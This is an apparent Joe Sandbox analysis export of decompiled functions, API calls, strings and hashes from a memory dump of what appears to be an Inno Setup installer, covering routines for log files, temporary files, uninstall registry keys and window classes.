\Clsid, xrefs: 00431EF1, 0043209D
CLSID\, xrefs: 00431F09, 00431F35, 00431F71, 00431FD0, 00432027, 00432060
\ProgID, xrefs: 00431F59, 0043204B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: 767876787A680B6840FileModuleName
String ID: CLSID\$\Clsid$\ProgID
API String ID: 509592647-3614834358
Opcode ID: fc2952e9214e0fc1254525acca68679531bb6c26c1e767de4bfb6949048bf057
Instruction ID: e59933bfd9215b6f2d74a14d8c996167f79c46d15c19afc275c682f12f2ed002
Opcode Fuzzy Hash: fc2952e9214e0fc1254525acca68679531bb6c26c1e767de4bfb6949048bf057
Instruction Fuzzy Hash: 42512370A0011C9BCB25EF51CA43ACDB7B9AF48705F5085FBA504A33A1DB78AF45CE69

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042E8C4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HDC__* _t54;
				void* _t63;
				intOrPtr _t81;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;

				_t67 = __ecx;
				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t84 = __ecx;
				_v8 = __edx;
				_t86 = __eax;
				_t66 = _a4;
				_push(_t89);
				_push(0x42ea17);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_push(0);
				L00406034();
				_v12 = 0;
				_push(_t89);
				_push(0x42e9f5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				SelectObject(_v12, E0041A400(_v8, _a4, __ecx, __ecx, __eax));
				E004035DC(_a4, _t86);
				E0042CA40( *_t66, _t67,  &_v20);
				E0042CA18( *_t66, _t67,  &_v24);
				_t87 = E0042C7A8();
				if(_t87 < E004036BC(_v20)) {
					_t63 =  *((intOrPtr*)(_v20 + _t87)) - 0x2f;
					if(_t63 == 0 || _t63 == 0x2d) {
						_t87 = _t87 + 1;
					}
				}
				E004038C0(_v20, _t87, 1,  &_v16);
				E00403900( &_v20, _t87, 1);
				while(_v20 != 0 || _v16 != 0) {
					if(_t84 < E0042E5A8(_v12, _t66, 0,  *_t66, _t84, _t87)) {
						if(_v20 != 0) {
							E0042E810( &_v20, _t66, _t84, _t87);
						}
						if(_v20 == 0 && _v16 != 0) {
							E00403548( &_v16);
							E004035DC( &_v20, 0x42ea30);
						}
						_push(_v16);
						_push(_v20);
						_push(_v24);
						E0040377C();
						continue;
					}
					break;
				}
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(0x42e9fc);
				_t54 = _v12;
				_push(_t54);
				_push(0);
				L0040621C();
				return _t54;
			}

0x0042e8c4
0x0042e8c5
0x0042e8c7
0x0042e8c9
0x0042e8cb
0x0042e8cd
0x0042e8cf
0x0042e8d1
0x0042e8d2
0x0042e8d3
0x0042e8d4
0x0042e8d6
0x0042e8d9
0x0042e8db
0x0042e8e0
0x0042e8e1
0x0042e8e6
0x0042e8e9
0x0042e8ec
0x0042e8ee
0x0042e8f3
0x0042e8f8
0x0042e8f9
0x0042e8fe
0x0042e901
0x0042e911
0x0042e91a
0x0042e924
0x0042e92e
0x0042e93b
0x0042e947
0x0042e94f
0x0042e951
0x0042e957
0x0042e957
0x0042e951
0x0042e966
0x0042e975
0x0042e9c0
0x0042e9da
0x0042e980
0x0042e985
0x0042e985
0x0042e98e
0x0042e999
0x0042e9a6
0x0042e9a6
0x0042e9ab
0x0042e9ae
0x0042e9b1
0x0042e9bb
0x00000000
0x0042e9bb
0x00000000
0x0042e9da
0x0042e9de
0x0042e9e1
0x0042e9e4
0x0042e9e9
0x0042e9ec
0x0042e9ed
0x0042e9ef
0x0042e9f4

APIs

740BAC50.USER32(00000000,00000000,0042EA17,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E8EE

Part of subcall function 0041A400: CreateFontIndirectA.GDI32(?), ref: 0041A4BF

SelectObject.GDI32(?,00000000), ref: 0042E911
740BB380.USER32(00000000,?,0042E9FC,00000000,0042E9F5,?,00000000,00000000,0042EA17,?,?,?,?,00000000,00000000,00000000), ref: 0042E9EF

Strings

...\, xrefs: 0042E9A1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B380CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 1304862298-983595016
Opcode ID: 8e49df5a06c53d855527ebaf7ea042df66f5ba8396f40c5ba01a9e4b5a8ae17b
Instruction ID: 983fc3d8c6e590b39f068f7f7a14ce2427bf6c10f89b92f47cd2e41a81d247c1
Opcode Fuzzy Hash: 8e49df5a06c53d855527ebaf7ea042df66f5ba8396f40c5ba01a9e4b5a8ae17b
Instruction Fuzzy Hash: 4C3163B0B00129AFDB10EB9AD841BAEB7B8EF49304F91447BF400A7291D7789E41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004555EC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004555EC(signed int __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				char _v72;
				intOrPtr _t88;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_t99 = _t100;
				_t101 = _t100 + 0xffffffbc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v72 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t99);
				_push(0x455759);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101;
				_t102 =  *0x48df04;
				if( *0x48df04 == 0) {
					E0042D990( &_v12, __ebx, __ecx, __edi, __esi);
					GetLocalTime( &_v44);
					_v68 = _v44.wYear & 0x0000ffff;
					_v64 = 0;
					_v60 = _v44.wMonth & 0x0000ffff;
					_v56 = 0;
					_v52 = _v44.wDay & 0x0000ffff;
					_v48 = 0;
					E00407B08("%.4u-%.2u-%.2u", 2,  &_v68,  &_v16);
					_v24 = 1;
					while(1) {
						_v68 = _v8;
						_v64 = 0xb;
						_v60 = _v16;
						_v56 = 0xb;
						_v52 = _v24;
						_v48 = 0;
						E00407B08("%s Log %s #%.3u.txt", 2,  &_v68,  &_v72);
						E00403708( &_v20, _v72, _v12);
						if(E0042CE3C(_v20, _t102) != 0) {
							goto L6;
						}
						_v28 = 0;
						_push(_t99);
						_push(0x4556f3);
						_push( *[fs:edx]);
						 *[fs:edx] = _t101;
						_v28 = E0044FF24(_v20, 1, 1, 1, 1);
						 *[fs:eax] = 0;
						if(_v28 == 0) {
							goto L6;
						}
						 *0x48df04 = _v28;
						E00455814("Log opened.", _t77, _t96, _t97);
						goto L8;
						L6:
						_v24 = _v24 + 1;
					}
				}
				L8:
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E00455760);
				E00403548( &_v72);
				return E00403568( &_v20, 3);
			}

0x004555ec
0x004555ec
0x004555ec
0x004555ed
0x004555ef
0x004555f2
0x004555f3
0x004555f4
0x004555f7
0x004555fa
0x004555fd
0x00455600
0x00455603
0x00455608
0x00455609
0x0045560e
0x00455611
0x00455614
0x0045561b
0x00455624
0x0045562d
0x0045563a
0x0045563d
0x00455645
0x00455648
0x00455650
0x00455653
0x00455664
0x00455669
0x00455670
0x00455677
0x0045567a
0x00455681
0x00455684
0x0045568b
0x0045568e
0x0045569f
0x004556ad
0x004556bc
0x00000000
0x00000000
0x004556c0
0x004556c5
0x004556c6
0x004556cb
0x004556ce
0x004556e6
0x004556ee
0x00455718
0x00000000
0x00000000
0x0045571d
0x00455731
0x00000000
0x00455724
0x00455724
0x00455724
0x00455670
0x00455736
0x00455738
0x0045573b
0x0045573e
0x00455746
0x00455758

APIs

GetLocalTime.KERNEL32(?,00000000,00455759,?,?,00000000,00000000,?,0048B38E,00000000,0048B3B6), ref: 0045562D

Strings

%.4u-%.2u-%.2u, xrefs: 0045565F
Log opened., xrefs: 0045572C
%s Log %s #%.3u.txt, xrefs: 0045569A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: LocalTime
String ID: %.4u-%.2u-%.2u$%s Log %s #%.3u.txt$Log opened.
API String ID: 481472006-3806465849
Opcode ID: 0c306130f1ef2792e5f90561c87c6241410c5e2e5fc7fd7511b713f76a08454d
Instruction ID: 354e8cb2dea216f4d243c521c570f91bad9375b759ab0410bebfaba155fc833e
Opcode Fuzzy Hash: 0c306130f1ef2792e5f90561c87c6241410c5e2e5fc7fd7511b713f76a08454d
Instruction Fuzzy Hash: BC414A70D00648EFDB00DFA9D8917EEBBF5EB49304F50806AE804B7292D7795A49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00451FB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00451FB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				signed int _v20;
				char _v24;
				char _v28;
				void* _t44;
				void* _t61;
				signed int _t64;
				intOrPtr _t78;
				void* _t83;
				void* _t86;

				_t65 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403870(_v8);
				_push(_t86);
				_push(0x4520ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86 + 0xffffffe8;
				E0042C614(_v8,  &_v24);
				E004035DC( &_v8, _v24);
				_t83 = 0x123456;
				_t64 = 0;
				_v13 = 0;
				do {
					_t83 = _t83 + 1;
					if(_t83 > 0x1ffffff) {
						_t83 = 0;
					}
					_t91 = 0x123456 - _t83;
					if(0x123456 == _t83) {
						E0042CC98(_v8, _t65,  &_v28, _t91);
						E00450C5C(0x45,  &_v24, _v28);
						_t65 = _v24;
						E00408DF0(_v24, 1);
						E00403264();
					}
					_push(_v8);
					_push("_iu");
					E00451E30(_t83, _t64,  &_v24, 0x123456, _t83);
					_push(_v24);
					_push(".tmp");
					E0040377C();
					_t44 = E0042CE28(_t91);
					_t92 = _t44;
					if(_t44 == 0) {
						_t64 = 1;
						_v13 = E0042CE14(_t92);
						if(_v13 != 0) {
							_push(0);
							_push(0x80);
							_push(2);
							_push(0);
							_push(0);
							_push(0xc0000000);
							_t61 = E00403880(_v20);
							_push(_t61);
							L00405964();
							_t64 = 0 | _t61 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t61);
							}
						}
					}
				} while (_t64 == 0);
				E00403598(_v12, _t64, _v20, 0x123456, _t83);
				_pop(_t78);
				 *[fs:eax] = _t78;
				_push(E004520F1);
				E00403568( &_v28, 3);
				return E00403548( &_v8);
			}

0x00451fb9
0x00451fbb
0x00451fbe
0x00451fc1
0x00451fc4
0x00451fc7
0x00451fcd
0x00451fd4
0x00451fd5
0x00451fda
0x00451fdd
0x00451fe6
0x00451ff1
0x00451ffb
0x00451ffd
0x00451fff
0x00452003
0x00452003
0x0045200a
0x0045200c
0x0045200c
0x0045200e
0x00452010
0x00452018
0x00452025
0x0045202a
0x00452034
0x00452039
0x00452039
0x0045203e
0x00452041
0x0045204b
0x00452050
0x00452053
0x00452060
0x00452068
0x0045206d
0x0045206f
0x00452071
0x0045207b
0x00452082
0x00452084
0x00452086
0x0045208b
0x0045208d
0x0045208f
0x00452091
0x00452099
0x0045209e
0x0045209f
0x004520a7
0x004520ac
0x004520af
0x004520af
0x004520ac
0x00452082
0x004520b4
0x004520c2
0x004520c9
0x004520cc
0x004520cf
0x004520dc
0x004520e9

APIs

6D2B5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004896C9,_iu,?,00000000,004520EA), ref: 0045209F
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004896C9,_iu,?,00000000,004520EA), ref: 004520AF

Strings

_iu, xrefs: 00452041
.tmp, xrefs: 00452053

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseHandle
String ID: .tmp$_iu
API String ID: 2962429428-10593223
Opcode ID: bf9e2311ef352c2b20d2414b5c3cdec807754aeb0dc3f7a745989eca53ef0f47
Instruction ID: 516a93afdce691cb25051af6565f2beb051f36453d0a210f228e3865ead176ed
Opcode Fuzzy Hash: bf9e2311ef352c2b20d2414b5c3cdec807754aeb0dc3f7a745989eca53ef0f47
Instruction Fuzzy Hash: 8D31B370A00219ABCB10EBA5C942B9EB7B5AF05709F20416BF910B73D2D6785F05CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 004859C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004859C8(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				void* _t38;
				intOrPtr _t39;
				void* _t55;
				intOrPtr* _t56;
				intOrPtr _t67;
				intOrPtr _t75;
				void* _t80;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t57 = __ecx;
				_t82 = _t83;
				_t84 = _t83 + 0xffffffe0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __edx;
				_t55 = __eax;
				_push(_t82);
				_push(0x485ae1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E004035DC(_a4, __ecx);
				if(_t55 == 0) {
					L5:
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x485ae8);
					return E00403568( &_v20, 2);
				} else {
					E0046EBF4(_t55, _t57,  &_v16);
					_t80 = 2;
					_t56 = 0x48cef4;
					while(1) {
						_v36 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v32 = 0xb;
						_v28 = _v16;
						_v24 = 0xb;
						E00407B08("%s\\%s_is1", 1,  &_v36,  &_v20);
						_t38 = E00403880(_v20);
						_t39 =  *0x48cb0c; // 0x1
						if(E0042DD88(_t39, _t38,  *_t56,  &_v12, 1, 0) == 0) {
							break;
						}
						_t56 = _t56 + 4;
						_t80 = _t80 - 1;
						if(_t80 != 0) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_push(_t82);
					_push(0x485ab5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t84;
					E004035DC( &_v20, "Inno Setup CodeFile: ");
					E004036C4( &_v20, _v8);
					E00403880(_v20);
					E0042DCB8();
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x485ac6);
					return RegCloseKey(_v12);
				}
				L6:
			}

0x004859c8
0x004859c9
0x004859cb
0x004859d3
0x004859d6
0x004859db
0x004859de
0x004859e5
0x004859e6
0x004859eb
0x004859ee
0x004859f5
0x004859fc
0x00485ac6
0x00485ac8
0x00485acb
0x00485ace
0x00485ae0
0x00485a02
0x00485a07
0x00485a0c
0x00485a11
0x00485a16
0x00485a27
0x00485a2a
0x00485a31
0x00485a34
0x00485a45
0x00485a4d
0x00485a56
0x00485a62
0x00000000
0x00000000
0x00485abc
0x00485abf
0x00485ac0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00485ac0
0x00485a66
0x00485a67
0x00485a6c
0x00485a6f
0x00485a7a
0x00485a85
0x00485a8d
0x00485a99
0x00485aa0
0x00485aa3
0x00485aa6
0x00485ab4
0x00485ab4
0x00000000

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,00485AC6,?,?,00000001,00000000,00000000,00485AE1), ref: 00485AAF

Strings

Inno Setup CodeFile: , xrefs: 00485A72
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00485A22
%s\%s_is1, xrefs: 00485A40

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2256921126-1837835967
Opcode ID: 8a81ba83a5b8fdecc60ba795356a817d32bb0c073b6c194c4a87fb33f5750451
Instruction ID: 7d83a7a22d7167586f7ac8d504246e6fa468ebfda22027ddfa4a7710731a6734
Opcode Fuzzy Hash: 8a81ba83a5b8fdecc60ba795356a817d32bb0c073b6c194c4a87fb33f5750451
Instruction Fuzzy Hash: 22317470A046145FDB15EFA9DCD1A9EBBF8EB48704F90497AE800E3391D778AE01CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0048A504 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0048A504(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v28;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t46;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t74;
				void* _t81;
				void* _t82;
				intOrPtr _t83;
				void* _t84;

				_t84 = __eflags;
				_t79 = __esi;
				_t78 = __edi;
				_t57 = __ebx;
				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_push(_t81);
				_push(0x48a733);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t21 =  *0x48d628; // 0x21d2410
				E004244DC(_t21, "Uninstall", __edi);
				_t23 =  *0x48d628; // 0x21d2410
				ShowWindow( *(_t23 + 0x20), 5);
				_push(_t81);
				_push(0x48a6ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				E00473CC0();
				E0042D8E0( &_v20);
				E00407488(_v20);
				E0042D468(0, __ebx,  &_v20, __edi, __esi);
				E00403598(0x4ae328, __ebx, _v20, _t78, __esi);
				E004890E8(_t57, _v20, _t78, _t79, _t84);
				_t58 =  *0x4ae328; // 0x0
				_v8 = E0044FF24(_t58, 1, 1, 0, 2);
				_push(_t81);
				_push(0x48a62d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				E0045001C(_v8,  &_v28);
				E00450194(_v28 - 8);
				E0045016C(_v8, 8,  &_v16);
				_t85 = _v16 - 0x67734d49;
				if(_v16 == 0x67734d49) {
					_t46 =  *0x4ae328; // 0x0
					E00450DB0(_t46, _t57, 1, _v12, _t78, _t79, __eflags);
				} else {
					_t51 =  *0x4ae328; // 0x0
					E0042C6B8(_t51, _t57,  &_v20, 0x48a760, _t78, _t79, _t85);
					E00403598(0x4ae330, _t57, _v20, _t78, _t79);
					_t55 =  *0x4ae330; // 0x0
					E00450DB0(_t55, _t57, 1, 0, _t78, _t79, _t85);
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E0048A634);
				return E00402CA0(_v8);
			}

0x0048a504
0x0048a504
0x0048a504
0x0048a504
0x0048a505
0x0048a507
0x0048a50a
0x0048a50b
0x0048a50c
0x0048a50f
0x0048a514
0x0048a515
0x0048a51a
0x0048a51d
0x0048a525
0x0048a52a
0x0048a531
0x0048a53a
0x0048a541
0x0048a542
0x0048a547
0x0048a54a
0x0048a54d
0x0048a555
0x0048a55d
0x0048a567
0x0048a574
0x0048a579
0x0048a584
0x0048a596
0x0048a59b
0x0048a59c
0x0048a5a1
0x0048a5a4
0x0048a5ad
0x0048a5bb
0x0048a5cb
0x0048a5d0
0x0048a5d7
0x0048a60d
0x0048a612
0x0048a5d9
0x0048a5e1
0x0048a5e6
0x0048a5f3
0x0048a5fc
0x0048a601
0x0048a601
0x0048a619
0x0048a61c
0x0048a61f
0x0048a62c

APIs

Part of subcall function 004244DC: SetWindowTextA.USER32(?,00000000), ref: 004244F4

ShowWindow.USER32(?,00000005,00000000,0048A733,?,?,00000000), ref: 0048A53A

Part of subcall function 0042D8E0: GetSystemDirectoryA.KERNEL32 ref: 0042D8F3

Part of subcall function 00407488: SetCurrentDirectoryA.KERNEL32(00000000,?,0048A562,00000000,0048A6FF,?,?,00000005,00000000,0048A733,?,?,00000000), ref: 00407493

Part of subcall function 0042D468: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4F3,?,?,00000000,?,?,0048A56C,00000000,0048A6FF,?,?,00000005), ref: 0042D49D

Part of subcall function 0044FF24: 6D2B5CA0.KERNEL32(00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000,00000002,00000000), ref: 0044FF7D

Part of subcall function 0045001C: GetFileSize.KERNEL32(?,00000004,00000000,?,0048A5B2,00000000,0048A62D,?,00000001,00000000,00000002,00000000,0048A6FF,?,?,00000005), ref: 0045002A
Part of subcall function 0045001C: GetLastError.KERNEL32(?,00000004,00000000,?,0048A5B2,00000000,0048A62D,?,00000001,00000000,00000002,00000000,0048A6FF,?,?,00000005), ref: 00450036

Strings

Uninstall, xrefs: 0048A520
.msg, xrefs: 0048A5DC
IMsg, xrefs: 0048A5D0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: DirectoryFileWindow$CurrentErrorLastModuleNameShowSizeSystemText
String ID: .msg$IMsg$Uninstall
API String ID: 2328437465-3145681768
Opcode ID: 2a90364e37d2729e29b676f13f1bc3c80f4fcdcee4e38e56cdade1453b099a9f
Instruction ID: 7b6bfc496daee7ada4590c7f8e59db63f78fbae63b1860f69919fee99f58681e
Opcode Fuzzy Hash: 2a90364e37d2729e29b676f13f1bc3c80f4fcdcee4e38e56cdade1453b099a9f
Instruction Fuzzy Hash: BC318134A00604AFDB00FB66CC52E9E7BB5EB49714F91883BF800A7292D779AD14DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416628 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416628(intOrPtr* __eax, void* __edi, void* __esi, void* __ebp) {
				char _v8;
				char _v12;
				struct _WNDCLASSA _v52;
				char _v116;
				struct _WNDCLASSA _v156;
				intOrPtr _v164;
				signed char _v185;
				void* __ebx;
				struct HINSTANCE__* _t32;
				signed int _t33;
				signed int _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t55;
				intOrPtr* _t62;

				_t76 = __esi;
				_t75 = __edi;
				_t62 = __eax;
				 *((intOrPtr*)( *__eax + 0x5c))();
				if(_v164 == 0 && (_v185 & 0x00000040) != 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					E00408F10(__eax, 0xf02f, 1, __edi, __esi, 0,  &_v12);
					E00403264();
				}
				 *((intOrPtr*)(_t62 + 0xac)) = _v156.lpfnWndProc;
				_t32 =  *0x48d014; // 0x400000
				_t33 = GetClassInfoA(_t32,  &_v116,  &_v52);
				asm("sbb eax, eax");
				_t35 =  ~( ~_t33);
				if(_t35 == 0 || E00413854 != _v52.lpfnWndProc) {
					if(_t35 != 0) {
						_t55 =  *0x48d014; // 0x400000
						UnregisterClassA( &_v116, _t55);
					}
					_v156.lpfnWndProc = E00413854;
					_t36 =  *0x48d014; // 0x400000
					_v156.hInstance = _t36;
					_v156.lpszClassName =  &_v116;
					if(RegisterClassA( &_v156) == 0) {
						E00408EA0(_t62, 0xf02c, 1, _t75, _t76);
						E00403264();
					}
				}
				 *0x48c2dc = _t62;
				_t64 =  *_t62;
				 *((intOrPtr*)( *_t62 + 0x60))();
				if( *((intOrPtr*)(_t62 + 0xc0)) == 0) {
					_t64 = 0xf02d;
					E00408EA0(_t62, 0xf02d, 1, _t75, _t76);
					E00403264();
				}
				E00407758( *((intOrPtr*)(_t62 + 0x40)));
				 *((intOrPtr*)(_t62 + 0x40)) = 0;
				E0041859C(_t62);
				return E00415458(_t62, E0041A400( *((intOrPtr*)(_t62 + 0x44)), _t62, _t64, _t75, _t76), 0x30, 1);
			}

0x00416628
0x00416628
0x0041662f
0x00416637
0x0041663f
0x0041664b
0x00416652
0x00416670
0x00416675
0x00416675
0x0041667e
0x00416691
0x00416697
0x0041669e
0x004166a0
0x004166a4
0x004166b6
0x004166b8
0x004166c3
0x004166c3
0x004166c8
0x004166d0
0x004166d5
0x004166dd
0x004166ee
0x004166fc
0x00416701
0x00416701
0x004166ee
0x00416706
0x00416710
0x00416712
0x0041671c
0x0041671e
0x0041672a
0x0041672f
0x0041672f
0x00416737
0x0041673e
0x00416743
0x00416767

APIs

GetClassInfoA.USER32 ref: 00416697
UnregisterClassA.USER32 ref: 004166C3
RegisterClassA.USER32 ref: 004166E6

Strings

@, xrefs: 00416641

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 43229e8da9ce3e3f4f96adc0c1fc8c79b1ef0366f75726ad0edd871e2e0a21a6
Instruction ID: 67cea70a595abc1ebc2e784fd8e21bc92d25681d946b583905747d802ef020d9
Opcode Fuzzy Hash: 43229e8da9ce3e3f4f96adc0c1fc8c79b1ef0366f75726ad0edd871e2e0a21a6
Instruction Fuzzy Hash: 873140706053408BDB10EF69C58179A77E5AB44308F00487EF945DB392DB39E945CB6A

Uniqueness

Uniqueness Score: -1.00%

